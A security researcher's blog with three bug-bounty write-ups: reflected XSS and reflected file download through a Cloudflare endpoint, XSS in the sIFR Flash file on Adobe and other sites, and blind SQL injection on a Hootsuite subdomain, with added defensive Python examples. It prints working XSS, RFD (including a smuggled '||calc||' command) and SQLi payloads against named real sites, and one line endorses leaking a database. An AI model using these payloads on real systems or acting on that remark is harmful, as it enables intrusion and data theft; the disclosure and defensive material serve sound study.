Monday, November 16, 2015

Cloudflare - when the firewall fails to protect itself

Hi,

A long time ago, I found an XSS bug in http://securityundefined.com in the path


I reported it and it got fixed after a while.

The vulnerable parameter was (r[]), but I did not know that the path (/cdn-cgi/pe/bag2?r[]=) belongs to Cloudflare, so I did not look into it.

After that, I was searching in a bug bounty program and got


I was surprised to see this path again. I thought maybe it is vulnerable like the previous one.

So I did a simple GET request:

GET /cdn-cgi/pe/bag2?r= HTTP/1.1
Host: xxxxxxxxxxxxxxxx.foo
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I got:

HTTP/1.1 405 Not Allowed
Date: Mon, 16 Nov 2015 16:17:42 GMT
Content-Type: text/html
Server: cloudflare-nginx
cf-ray: 246481f1dd7c08ea-CDG
Transfer-Encoding: chunked
Connection: Keep-Alive

What?!! The website is not Cloudflare's? Why is the responding server Cloudflare?
I understood that it uses Cloudflare services.

But how does it work? And why do I get (405 Not Allowed) in the response, when I want a (200 OK!)?

I used a proxy to get a clean HTTP request that gets the 200 OK.

GET /cdn-cgi/pe/bag2?r[]=http://foo.bar/xxx.js HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I saw the (PE-Token) in the request and I changed the (http://foo.bar/xxx.js) to (<script>alert(1)</script>).

Firefox: nothing!
IE 9, 10, 11: the XSS works!!

After some looking, the content type was set to (Content-Type: multipart/mixed), so IE read it as an HTML page and the JS worked.

But here is the problem: where can I get the (PE-Token)??
Solution: when you get the (405 Not Allowed) you will get a simple page.

If you view the source code, you will see:

<head><title>405 Not Allowed</title><script type="text/javascript">
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:1438806465,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"xxxxxxxxxxx",petok:"1181d2a8d2f71217d89f9a70eb521bd7334e1a25-1438819567-1800",betok:"6ac82112672bec8b142092f8509e441fc0771df0-1438819567-120",zone:"salesforce.com",rocket:"0",apps:{"clky":{"sid":"xxxx","uid":"xxxx"}}}];!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=d134393e0a/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){};
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>

The petok = PE-Token

Now we can make a PoC, if we have a good crossdomain policy that allows doing cross requests.
I did not find a website like that, so it was just a scenario.

I see that many websites use the service from Cloudflare.

Here are some of them, with XSS:

There are many more.

And you can use it as RFD:

GET /cdn-cgi/pe/bag2;/update.bat?r[]=%22FOO:BAR\%22||calc||%22

I reported it to Cloudflare; they marked it as N/A but fixed it anyway.

Done!!
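The two browser-side problems described in this post (a reflected value served with a content type the browser sniffs as HTML, and a download name controlled through the ";/update.bat" path suffix) are both fixable on the server. Below is an added example written for this page, not Cloudflare's code: the endpoint path, the helper names, the rejection policy and the fixed "bag2.txt" filename are assumptions chosen to illustrate the fix, and the "before" function reproduces only what the post reports.

```python
"""Server-side hardening for an endpoint that reflects caller-supplied
values back to the browser.  Added example for this page, not Cloudflare
code; the endpoint path, helper names and the fixed download filename are
assumptions made for illustration."""
import html
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


# The write-up shows two browser-facing failures:
#  1. a reflected value returned as multipart/mixed, which IE sniffs as
#     HTML, so a <script> in the parameter runs (reflected XSS);
#  2. a ";/update.bat" path suffix plus a reflected value that lets the
#     response be saved under a caller-chosen filename (RFD).

def canonical_path(request_path: str):
    """Route only on the exact endpoint path and refuse path-parameter
    suffixes (";...") so the served filename is never chosen by the caller.
    The endpoint path is an assumption for this example."""
    if ";" in request_path or "\\" in request_path:
        return None
    return request_path if request_path == "/cdn-cgi/pe/bag2" else None


def is_acceptable_resource_url(value: str) -> bool:
    """Accept only absolute http(s) URLs without characters that could
    close a text or HTML context.  Anything else is rejected rather than
    echoed back."""
    if any(ch in value for ch in '<>"\'\\ \t\r\n'):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def vulnerable_response(values):
    """'before': raw reflection with a sniffable content type and no
    X-Content-Type-Options header, as the post describes."""
    return Response(200, {"Content-Type": "multipart/mixed"}, "\n".join(values))


def hardened_response(values):
    """'after': validate, escape, pin the content type, forbid sniffing
    and fix the download filename server-side."""
    safe_headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",  # browsers must not guess HTML
        "Content-Disposition": 'attachment; filename="bag2.txt"',  # not caller-controlled
    }
    if not values or not all(is_acceptable_resource_url(v) for v in values):
        return Response(400, safe_headers, "bad resource url")
    # Escaping is defence in depth: even if some consumer renders the body
    # as HTML, the reflected text cannot introduce markup.
    body = "\n".join(html.escape(v, quote=True) for v in values)
    return Response(200, safe_headers, body)


if __name__ == "__main__":
    print(vulnerable_response(["<script>alert(1)</script>"]))
    print(hardened_response(["<script>alert(1)</script>"]))
    print(hardened_response(["http://foo.bar/xxx.js"]))
    print(canonical_path("/cdn-cgi/pe/bag2;/update.bat"))
```

Of the three controls, the nosniff header alone would have stopped the IE behaviour the post describes; the fixed Content-Disposition filename is what removes the RFD angle, and rejecting non-URL input means nothing attacker-shaped is reflected at all.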

Monday, August 3, 2015

One payload to XSS them all!

Hi,

Today I want to share my find from 2013, which is an XSS in a Flash file that was used on many websites (famous websites!).
The Flash file was called sIFR (Scalable Inman Flash Replacement).

Q: How did I find it?

A: Until today I was thinking that I was the first one who reported this issue; in fact it is an old bug
that has a CVE (Read more).

So let's talk about what I found. I was looking for bugs in Adobe, and my exploring got me to:

http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=ADOBE PHOTOSHOP CS3&textcolor=

The (txt) parameter takes simple text.
The (textcolor) parameter takes an HTML color code.


The page shows XSS, and when I make the payload:

Hmmm, good, the txt parameter shows our text. Let's do HTML things.

http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=<a href="javascript:alert('Xssed by Abdullah Hussam')">xss</a>

It works!!! And I found XSS on Adobe. But I noticed something in the URL:

http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=ADOBE PHOTOSHOP CS3&textcolor=
It looks like the path of a file in (www.adobe.com), so I deleted the (wwwimages.adobe.com/) from the URL

and went to:

https://www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=<a href="javascript:alert('Xssed by Abdullah Hussam')">xss</a>

XSS showed in the page; I clicked on it and boom!

Please bear with me that I injected my name in the code; it was my start at bug bounty hhhhh :).

So it was very good.

Now I was thinking that (sIFR2.0.2) is an Adobe product that I could find on other websites.

I made a dork to find others.

There were too many websites. Wait for the surprise, it was a big one:

Visa, AMEX, Blackberry, Stanford, Harvard, and many Gov sites

Here are some samples:

The PoC video:

There are many other vulnerable websites.
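A defender who still has a Flash asset like this deployed wants to know when its txt/textcolor parameters are being fed markup. The following is an added example for this page, not code from the post or from sIFR: a small access-log check that decodes the query string of any .swf request and flags tag openers, script-capable URL schemes, and textcolor values that are not color codes. The log lines are constructed (RFC 5737 documentation addresses), and the field names and thresholds are assumptions.

```python
"""Detection sketch: flag requests that pass markup or script URLs in the
query string of an .swf resource, the pattern the sIFR txt/textcolor bug
above was exploited through.  Added example, not code from the post; the
access-log lines are constructed and the field names are assumptions."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) \S+')

MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)                  # an HTML tag opener
SCHEME_RE = re.compile(r"(javascript|vbscript|data)\s*:", re.I)  # script-capable URL scheme
COLOR_RE = re.compile(r"^#?[0-9a-f]{3}(?:[0-9a-f]{3})?$", re.I)  # what textcolor should be


def suspicious_swf_params(target: str):
    """Return a list of findings for one request target; empty if benign.
    Only .swf targets are inspected.  Values are decoded a second time so a
    double-encoded payload (%253C) is still seen."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decoded once already
        if MARKUP_RE.search(decoded) or SCHEME_RE.search(decoded):
            findings.append(f"{name}: markup or script scheme")
        elif name == "textcolor" and decoded and not COLOR_RE.match(decoded):
            findings.append("textcolor: not a color code")
    return findings


def scan_access_log(lines):
    """Run the check over log lines and return one dict per hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not Common Log Format; skip rather than guess
        client, _method, target, status = match.groups()
        findings = suspicious_swf_params(target)
        if findings:
            hits.append({"line": number, "client": client, "target": target,
                         "status": int(status), "findings": findings})
    return hits


# Constructed sample log: one benign sIFR request, one carrying a link with
# a javascript: href, one non-.swf request (ignored), one odd textcolor.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2013:12:00:01 +0000] "GET /lib/com.adobe/sIFR2.0.2/myriad.swf?txt=ADOBE+PHOTOSHOP+CS3&textcolor=%23000000 HTTP/1.1" 200 4132',
    '203.0.113.9 - - [10/Aug/2013:12:00:07 +0000] "GET /lib/com.adobe/sIFR2.0.2/myriad.swf?txt=%3Ca+href%3D%22javascript:alert(1)%22%3Exss%3C/a%3E HTTP/1.1" 200 4132',
    '198.51.100.2 - - [10/Aug/2013:12:00:09 +0000] "GET /index.html?q=%3Cb%3Ehi HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Aug/2013:12:00:12 +0000] "GET /lib/com.adobe/sIFR2.0.2/myriad.swf?txt=hello&textcolor=red%22%3E HTTP/1.1" 200 4132',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["line"], hit["client"], hit["findings"])
```

The textcolor check is the cheap win: the parameter has one legitimate shape, so anything else is worth a look even when no tag is present. Because the flagged requests in the post all returned 200, the status code is kept in each hit so the triage can tell a blocked probe from one that was actually served.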

Thanks for reading.

Useful links:

Saturday, August 1, 2015

Blind SQL injection [Hootsuite]

Hi, I will start publishing some of my findings.

In 2014 I found a Blind SQL injection at a Hootsuite subdomain (https://learn.hootsuite.com).

Blind SQL Injection:
Is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

When I signed up for a new account and explored the site, I saw that the photos of users were connected to a PHP file to be shown as a profile image.

I copied the link and went to it:


It was good and the photo was displayed well.

Let's do magic things:


The page was white, totally white!!

This looks like SQLi. I did many tests and found out that it is blind SQL injection.

For example, you can do a simple test:

1- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=1 

OK!!

2- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=2 

Error!!

I did not have much experience in SQLi at that time, so I used SQLMAP to make sure whether it is blind or not.

Type: boolean-based blind
Database: hootsuite_u_v2

So I was right.
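To show what the two probes above actually do inside the query, here is an added illustration, not code from Hootsuite or the author: the profile-image lookup as a vulnerable function that concatenates the id, next to a parameterized one. The profile_image table, its columns and rows are constructed for the example (SQLite in memory); only the id 8807 and the two probe values come from the post.

```python
"""Boolean-based blind SQLi: the lookup the post describes, as a
vulnerable function beside a parameterized one.  Added example, not
Hootsuite's code; the profile_image table, its columns and rows are
constructed for illustration (SQLite in memory).  Only the id 8807 and
the two probe values come from the post."""
import sqlite3


def make_db():
    """Constructed sample data: two users with profile image paths."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE profile_image (id INTEGER PRIMARY KEY, user TEXT, path TEXT)")
    con.executemany("INSERT INTO profile_image VALUES (?, ?, ?)",
                    [(8807, "alice", "img/8807.jpg"), (8808, "bob", "img/8808.jpg")])
    return con


def vulnerable_lookup(con, user_id: str):
    """'before': the id is concatenated into the statement, so
    "8807 and 1=2" rewrites the WHERE clause and the page goes blank.
    That image-vs-blank difference is the true/false oracle the post
    describes: no error text is needed."""
    sql = "SELECT path FROM profile_image WHERE id = " + user_id
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_lookup(con, user_id: str):
    """'after': reject anything that is not a decimal integer, then bind
    the value as a parameter so it can never become SQL syntax."""
    if not user_id.isdigit():
        raise ValueError("id must be a decimal integer")
    row = con.execute("SELECT path FROM profile_image WHERE id = ?",
                      (int(user_id),)).fetchone()
    return row[0] if row else None


def probe_behaviour(lookup, con):
    """Return what each of the post's three requests yields for a lookup
    function: the image path, None (blank page), or 'rejected'."""
    results = {}
    for probe in ("8807", "8807 and 1=1", "8807 and 1=2"):
        try:
            results[probe] = lookup(con, probe)
        except ValueError:
            results[probe] = "rejected"
    return results


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe_behaviour(vulnerable_lookup, db))
    print("safe:      ", probe_behaviour(safe_lookup, db))
```

The vulnerable version answers "and 1=1" with the image and "and 1=2" with nothing, which is exactly the two-state signal a boolean-based blind attack reads one bit at a time. The parameterized version gives the same response (a rejection) to both probes, so there is no longer anything to infer from.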

I made a report and sent it with all info and details.

I got:

I was surprised that a security team does not know what SQL injection is. I sent the file, parameter, payload, and type.

After many messages and replies they fixed the SQLi in months and blocked me, I think!! Because they told me they would see if they could add me to the hall of fame. I waited and nothing; I did try to contact them but got no reply, so I left them.

Sometimes you should do bad things like leak the DB!!!
There were 10k users or 100k, I do not remember.
That is all about it.

Thanks for reading.

Useful links:
1- https://www.owasp.org/index.php/Blind_SQL_Injection
2- https://en.wikipedia.org/wiki/SQL_injection 
3- https://www.acunetix.com/websitesecurity/blind-sql-injection/
4- https://hackerone.com/reports/21899
5- There are many cool articles and write-ups about SQLi you can look for.